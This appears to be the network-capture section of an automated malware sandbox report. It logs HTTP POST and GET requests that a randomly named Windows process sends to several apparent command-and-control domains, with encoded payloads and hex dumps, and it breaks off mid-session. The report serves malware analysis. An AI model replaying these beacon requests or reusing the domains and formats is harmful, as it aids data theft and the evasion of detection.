                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.752103148.72.152.174804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:36:54.884459972 CEST573OUTGET /2jit/?QF4tL=lBP8AZrpnb&7lpPGx=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1SqQDUweCIsEqLd/p7kKGUYrPSxxpvnmiXhdiVPK1m148tdjfTEW52DcI HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.elsupertodo.net
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Sep 25, 2024 11:36:55.380481958 CEST556INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 09:36:55 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://www.elsupertodo.net/2jit/?QF4tL=lBP8AZrpnb&7lpPGx=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1SqQDUweCIsEqLd/p7kKGUYrPSxxpvnmiXhdiVPK1m148tdjfTEW52DcI
                                              X-XSS-Protection: 1; mode=block
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.7521043.33.130.190804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:37:16.133428097 CEST823OUTPOST /7xi5/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.omexai.info
                                              Origin: http://www.omexai.info
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 219
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.omexai.info/7xi5/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 76 7a 67 59 35 44 63 68 62 55 54 75 44 6a 34 66 55 36 59 48 75 70 73 47 53 50 58 6d 52 46 49 67 6c 35 4a 41 74 2b 4d 75 37 6a 4c 74 48 52 35 37 37 73 30 70 67 61 79 37 52 48 78 61 61 51 4a 56 73 42 44 31 78 47 70 2b 6d 36 66 2f 53 36 35 79 43 72 38 56 5a 44 76 44 44 6a 48 7a 6a 31 32 43 74 62 6f 53 38 53 77 4e 65 63 42 37 34 37 61 6b 62 4c 6f 74 59 51 52 6f 4b 57 73 4f 69 72 6f 61 47 55 5a 53 6c 65 50 4f 47 57 6a 79 37 79 73 35 65 4e 69 47 54 71 6e 6e 34 39 35 72 6b 77 52 65 35 78 47 6b 63 2f 33 47 4a 66 50 6b 47 77 51 52 68 31 39 31 6b 6b 4f 6d 66 61 6f 45 5a 44 7a 59 30 53 62 6c 6a 2f 35 4b 72 57 6e 6f 73 68 51 2b 4f 41 3d 3d
                                              Data Ascii: 7lpPGx=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5xGkc/3GJfPkGwQRh191kkOmfaoEZDzY0Sblj/5KrWnoshQ+OA==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.7521053.33.130.190804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:37:18.671310902 CEST843OUTPOST /7xi5/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.omexai.info
                                              Origin: http://www.omexai.info
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 239
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.omexai.info/7xi5/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 51 6a 74 48 77 4a 37 36 75 63 70 6c 61 79 37 4a 33 78 47 55 77 4a 43 73 42 66 4c 78 43 74 2b 6d 2b 2f 2f 53 36 4a 79 43 59 55 61 44 7a 76 4e 58 54 48 78 2b 46 32 43 74 62 6f 53 38 53 30 33 65 63 70 37 34 72 71 6b 61 70 4d 69 56 77 52 76 63 6d 73 4f 6d 72 6f 57 47 55 5a 4b 6c 65 2b 47 47 55 72 79 37 79 63 35 65 5a 2b 48 49 61 6e 62 31 64 34 66 71 78 31 57 2b 51 66 65 55 50 72 38 52 76 37 42 4b 6d 4e 7a 37 58 78 5a 36 31 32 64 62 59 4d 79 4f 6c 75 74 32 54 66 39 75 64 4e 72 30 68 43 43 68 7a 78 36 59 77 4e 33 59 2b 61 46 4a 4f 70 34 74 55 36 64 2b 6d 50 45 67 46 38 3d
                                              Data Ascii: 7lpPGx=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7QjtHwJ76ucplay7J3xGUwJCsBfLxCt+m+//S6JyCYUaDzvNXTHx+F2CtboS8S03ecp74rqkapMiVwRvcmsOmroWGUZKle+GGUry7yc5eZ+HIanb1d4fqx1W+QfeUPr8Rv7BKmNz7XxZ612dbYMyOlut2Tf9udNr0hCChzx6YwN3Y+aFJOp4tU6d+mPEgF8=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.7521063.33.130.190804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:37:21.218815088 CEST1856OUTPOST /7xi5/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.omexai.info
                                              Origin: http://www.omexai.info
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 1251
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.omexai.info/7xi5/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 57 37 74 48 69 42 37 34 50 63 70 6d 61 79 37 41 58 78 46 55 77 4a 66 73 42 48 50 78 43 68 49 6d 34 7a 2f 54 5a 42 79 4b 4a 55 61 4e 44 76 4e 49 44 48 30 6a 31 32 79 74 62 35 56 38 54 45 33 65 63 70 37 34 70 43 6b 64 37 6f 69 47 67 52 6f 4b 57 73 43 69 72 70 44 47 55 42 30 6c 61 69 57 48 6c 4c 79 34 53 4d 35 66 73 69 48 45 61 6e 6a 79 64 34 48 71 78 49 49 2b 55 2b 6e 55 4d 32 62 52 6f 50 42 4f 48 49 30 6e 56 74 79 6b 44 75 51 52 62 6b 30 50 30 71 59 35 77 7a 35 7a 4e 73 4c 2f 52 61 72 6d 31 42 42 61 77 5a 7a 59 6f 6d 75 50 50 70 76 69 6b 44 47 6c 56 37 62 7a 43 30 74 43 4b 32 69 6d 59 66 33 5a 5a 44 31 32 4e 45 2f 52 38 62 63 64 62 7a 65 72 46 6a 62 61 31 66 63 74 52 43 39 43 41 44 65 6b 4f 34 35 42 76 53 30 2f 2b 68 36 47 52 32 4b 6f 50 4a 38 67 32 75 41 45 42 47 37 4c 77 58 79 34 51 41 45 6d 32 51 76 55 58 79 67 41 59 67 76 2b 65 2f 71 70 76 56 45 78 32 57 [TRUNCATED]
                                              Data Ascii: 7lpPGx=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7W7tHiB74Pcpmay7AXxFUwJfsBHPxChIm4z/TZByKJUaNDvNIDH0j12ytb5V8TE3ecp74pCkd7oiGgRoKWsCirpDGUB0laiWHlLy4SM5fsiHEanjyd4HqxII+U+nUM2bRoPBOHI0nVtykDuQRbk0P0qY5wz5zNsL/Rarm1BBawZzYomuPPpvikDGlV7bzC0tCK2imYf3ZZD12NE/R8bcdbzerFjba1fctRC9CADekO45BvS0/+h6GR2KoPJ8g2uAEBG7LwXy4QAEm2QvUXygAYgv+e/qpvVEx2W9AfklD5W/jKcCk4WRbYd6qkIYV6+iXO/k7ZQ7+85PB+faC5FhYCHvabyN4Dq2tHidCT1YEkPTApS1Sa8suzuhmtQFtoskBV5loS0Ji17YoBL5thyQnNtC23vXs1FOc23gZAK52Jc1qb3kJyilVA5resZkuFx5URVXyget5Hnwov91YZxvrc39e2gJl1aY7fSbX/sdFHG9ggU9XnKQbvhfglG7OYJex8kKeDpT8BSdJB1qt3oqLO36AiONwQdw/U33qn/EY4i0kznlFh5s0S8N+Ja2oYfYcbDeqRPMWUoUHWD3VwDttSi404R0zOPPOfz2awUkVzRz2w3a9sz2QHhs5nk5HbjVgc+9yDPWT11a/U3nOGIsFGhYkpSGkWhHuaqzzuUOCYhhT4NqguLCwISNx9Hue6U3huuGKlOYdf4p3Gaq9lv/w+9E9rYxdtF362NvozgttdGPxmCrBsupOK9rlJJrpuWeXWei8pvn0t/Svdm7LcFvcSvnEbhq/9Y1KXRVtxANBMta6/6wtKKLzn9kjmXaSQOFxjQL518Ims8qB25R0gq9FvNjnr/6XD1yzDL9m+RhktO3LcMN4sRNdDARdsYUm5iMUPj7t8fJUqaqzK1EZ8cEyUcyjjCAm1NCfbmGoFPrBepJ9uO3+Nin+oWwcVS6REo4m0OlF [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.7521073.33.130.190804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:37:23.761811018 CEST569OUTGET /7xi5/?7lpPGx=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&QF4tL=lBP8AZrpnb HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.omexai.info
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Sep 25, 2024 11:37:24.230459929 CEST419INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Wed, 25 Sep 2024 09:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 279
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 37 6c 70 50 47 78 3d 69 78 49 34 36 7a 77 44 4e 57 4f 6f 4b 30 64 2b 52 5a 38 4a 75 61 5a 44 59 2f 2f 51 56 47 6f 2b 71 73 46 4c 2b 76 34 68 7a 78 71 46 47 54 34 70 33 2b 38 57 74 6f 50 4b 47 55 73 2f 61 54 31 66 6b 44 6e 63 78 51 52 66 6c 70 71 4a 56 75 4e 51 46 62 45 4c 41 78 72 63 42 54 7a 74 70 6a 71 42 72 5a 68 77 69 41 30 45 48 2f 6c 54 6f 71 7a 75 53 34 38 65 58 6d 5a 4a 48 42 78 30 6d 50 4e 4d 44 32 5a 62 31 4e 65 53 42 55 71 75 26 51 46 34 74 4c 3d 6c 42 50 38 41 5a 72 70 6e 62 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7lpPGx=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&QF4tL=lBP8AZrpnb"}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.752108172.191.244.62804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:37:29.659002066 CEST823OUTPOST /fpzw/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.tekilla.wtf
                                              Origin: http://www.tekilla.wtf
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 219
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.tekilla.wtf/fpzw/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 5a 59 70 59 62 77 72 56 71 75 6a 52 30 5a 66 55 35 75 31 65 7a 36 63 32 6e 5a 55 78 52 71 58 4e 76 64 6a 36 69 61 68 4c 38 57 43 31 41 56 38 56 36 31 4f 58 47 67 54 34 35 35 6e 38 56 56 43 54 6f 43 59 32 36 33 44 33 5a 44 59 46 61 77 44 31 4b 70 49 64 36 79 42 73 35 59 7a 4a 64 66 56 31 66 73 41 55 30 37 68 72 75 6f 75 49 5a 68 31 45 33 65 6d 56 61 43 49 6f 66 53 72 64 58 67 50 65 4b 64 52 66 76 79 6c 4e 41 2b 47 54 56 6f 7a 55 54 6a 41 61 53 41 4e 59 46 36 45 70 4e 32 76 6c 6e 4d 55 6a 52 37 53 42 48 56 43 67 4d 67 6d 7a 30 34 31 55 75 62 55 6d 4f 58 4d 6c 75 2f 50 66 45 43 31 36 67 3d 3d
                                              Data Ascii: 7lpPGx=imRwTcaaL03jmZYpYbwrVqujR0ZfU5u1ez6c2nZUxRqXNvdj6iahL8WC1AV8V61OXGgT455n8VVCToCY263D3ZDYFawD1KpId6yBs5YzJdfV1fsAU07hruouIZh1E3emVaCIofSrdXgPeKdRfvylNA+GTVozUTjAaSANYF6EpN2vlnMUjR7SBHVCgMgmz041UubUmOXMlu/PfEC16g==
                                              Sep 25, 2024 11:37:30.189925909 CEST195INHTTP/1.1 404 Not Found
                                              Content-Type: text/plain; charset=utf-8
                                              X-Content-Type-Options: nosniff
                                              Date: Wed, 25 Sep 2024 09:37:30 GMT
                                              Content-Length: 19
                                              Connection: close
                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                              Data Ascii: 404 page not found


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.752109172.191.244.62804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:37:32.202111959 CEST843OUTPOST /fpzw/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.tekilla.wtf
                                              Origin: http://www.tekilla.wtf
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 239
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.tekilla.wtf/fpzw/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 35 49 70 61 34 6f 72 51 4b 75 67 65 55 5a 66 44 70 75 78 65 30 79 63 32 6c 31 45 78 69 65 58 4e 4c 5a 6a 37 6a 61 68 46 63 57 43 37 67 55 33 62 61 31 48 58 47 73 62 34 35 56 6e 38 56 70 43 54 70 53 59 32 4a 66 43 78 4a 44 47 4e 36 77 42 34 71 70 49 64 36 79 42 73 35 4e 57 4a 63 33 56 30 75 63 41 47 41 58 75 6a 4f 6f 74 59 70 68 31 56 6e 65 69 56 61 43 2b 6f 64 6d 53 64 56 6f 50 65 4c 74 52 52 65 79 6d 61 77 2b 36 4f 6c 70 45 53 6a 53 37 52 54 6b 33 58 6b 4b 5a 68 65 36 6b 74 78 52 32 35 7a 33 2b 66 57 74 35 6b 4f 45 51 6b 53 6c 41 57 76 66 4d 72 73 6a 74 36 5a 61 6c 53 57 6a 78 73 66 4b 52 68 67 74 45 58 57 46 44 2f 4e 58 50 56 4b 38 56 69 4d 77 3d
                                              Data Ascii: 7lpPGx=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExieXNLZj7jahFcWC7gU3ba1HXGsb45Vn8VpCTpSY2JfCxJDGN6wB4qpId6yBs5NWJc3V0ucAGAXujOotYph1VneiVaC+odmSdVoPeLtRReymaw+6OlpESjS7RTk3XkKZhe6ktxR25z3+fWt5kOEQkSlAWvfMrsjt6ZalSWjxsfKRhgtEXWFD/NXPVK8ViMw=
                                              Sep 25, 2024 11:37:32.652033091 CEST195INHTTP/1.1 404 Not Found
                                              Content-Type: text/plain; charset=utf-8
                                              X-Content-Type-Options: nosniff
                                              Date: Wed, 25 Sep 2024 09:37:32 GMT
                                              Content-Length: 19
                                              Connection: close
                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                              Data Ascii: 404 page not found


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.752110172.191.244.62804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:37:34.750504017 CEST1856OUTPOST /fpzw/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.tekilla.wtf
                                              Origin: http://www.tekilla.wtf
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 1251
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.tekilla.wtf/fpzw/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 35 49 70 61 34 6f 72 51 4b 75 67 65 55 5a 66 44 70 75 78 65 30 79 63 32 6c 31 45 78 6a 6d 58 4e 65 4e 6a 36 41 79 68 45 63 57 43 6c 77 55 30 62 61 30 48 58 46 63 66 34 35 4a 5a 38 51 74 43 51 4f 53 59 30 34 66 43 34 4a 44 47 50 36 77 45 31 4b 70 64 64 35 61 4e 73 35 64 57 4a 63 33 56 30 74 30 41 52 45 37 75 6c 4f 6f 75 49 5a 68 68 45 33 65 4b 56 5a 79 75 6f 64 79 64 65 6b 49 50 65 72 39 52 54 73 71 6d 59 51 2b 34 4e 6c 70 63 53 6a 65 6b 52 54 34 52 58 6b 4f 6a 68 63 71 6b 38 33 6b 79 67 67 58 79 64 41 35 6b 76 50 38 42 72 68 78 52 53 2b 7a 50 74 73 37 61 38 2b 47 74 53 47 62 72 67 6f 47 63 77 68 74 45 49 79 4a 76 34 4a 44 41 50 34 73 56 32 6f 53 37 47 68 61 59 68 77 34 61 44 53 4f 53 6f 44 4f 44 57 34 36 73 31 49 30 6d 52 4d 53 35 33 63 6a 69 33 63 67 62 46 34 57 43 36 69 67 4b 58 4c 59 76 4f 65 4f 30 56 59 58 75 36 30 53 75 57 67 2b 67 48 68 43 4f 2b 77 34 31 41 45 2b 2f 30 4a 64 6b 6d 75 7a 48 6e 67 31 57 69 74 7a 63 72 39 72 51 2f 7a 59 [TRUNCATED]
                                              Data Ascii: 7lpPGx=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExjmXNeNj6AyhEcWClwU0ba0HXFcf45JZ8QtCQOSY04fC4JDGP6wE1Kpdd5aNs5dWJc3V0t0ARE7ulOouIZhhE3eKVZyuodydekIPer9RTsqmYQ+4NlpcSjekRT4RXkOjhcqk83kyggXydA5kvP8BrhxRS+zPts7a8+GtSGbrgoGcwhtEIyJv4JDAP4sV2oS7GhaYhw4aDSOSoDODW46s1I0mRMS53cji3cgbF4WC6igKXLYvOeO0VYXu60SuWg+gHhCO+w41AE+/0JdkmuzHng1Witzcr9rQ/zYVBNHBaOWphyr1CjjrfhMdNdOZtvLdPnxiIOCWifVdAS+9avR69PrpiP3og+/C3eOixHriMiJa3B6X2o/kF4IGxfq8kXTdxzKEUqeZW5QgKu50qdQOBKTIvXpWMNuj2XpfyLS8oWtStL7U+6D42sExOvRmGIw+Rzzk5F9T9rx/BrkZJ9+pN0wSvLp1vxjIsPzNDLcEZYIzXdwBSSxGF40lBfpr+VFmsCe810NmPtVUjJ1hQz01mzf6YyBY+61TmmiQSsszVkzXJDU2edWbplxRFGtSjk/5AGBNrvH6Y26M4FEbRXcC6gjwCw30gw90EUaD4pGW9A1ij3FRBJ4siYWJes28j9r8kXHlTCqQ9lFrCLJ8l0zvr7Q1sbsUhOL/T6OGU+yB9441u4mYGLp9jj1G6P8DqT1fUmdmF0xrg6QrY4fKZtfmf+O0xC2F0O1Rs91RA2lV3i/Qh1Chz1MvHpoUbbw40GzXTS6GxRbK+R+mxhVVFQB9UPyXN5zGIPQrPr7UPxblf7ChQXJ3Im5/+fVm58HSb/UcjMeBwehwHYTMPd3JaV5lLAqpib/+Zm8jqgxx0KigNcLfuSpoPGXSLc2ZkOkhjAB9ZA97wkDwnzB+/5UhQ/+4s9fAIe5HCFOXLdJo8D9Gwh58HNinYYD3BJEErBGQ9ojeiNpgm [TRUNCATED]
                                              Sep 25, 2024 11:37:35.206567049 CEST195INHTTP/1.1 404 Not Found
                                              Content-Type: text/plain; charset=utf-8
                                              X-Content-Type-Options: nosniff
                                              Date: Wed, 25 Sep 2024 09:37:35 GMT
                                              Content-Length: 19
                                              Connection: close
                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                              Data Ascii: 404 page not found


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.752111172.191.244.62804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:37:37.293060064 CEST569OUTGET /fpzw/?QF4tL=lBP8AZrpnb&7lpPGx=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx67RM9UV6q1id4S41bRGRNPU7sZmTTXii7ECS+ocOWyNUrGm29a8UkIU HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.tekilla.wtf
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Sep 25, 2024 11:37:37.743155003 CEST195INHTTP/1.1 404 Not Found
                                              Content-Type: text/plain; charset=utf-8
                                              X-Content-Type-Options: nosniff
                                              Date: Wed, 25 Sep 2024 09:37:37 GMT
                                              Content-Length: 19
                                              Connection: close
                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                              Data Ascii: 404 page not found


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.752112172.96.191.39804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:37:43.167974949 CEST832OUTPOST /3qit/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.bola88site.one
                                              Origin: http://www.bola88site.one
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 219
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.bola88site.one/3qit/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
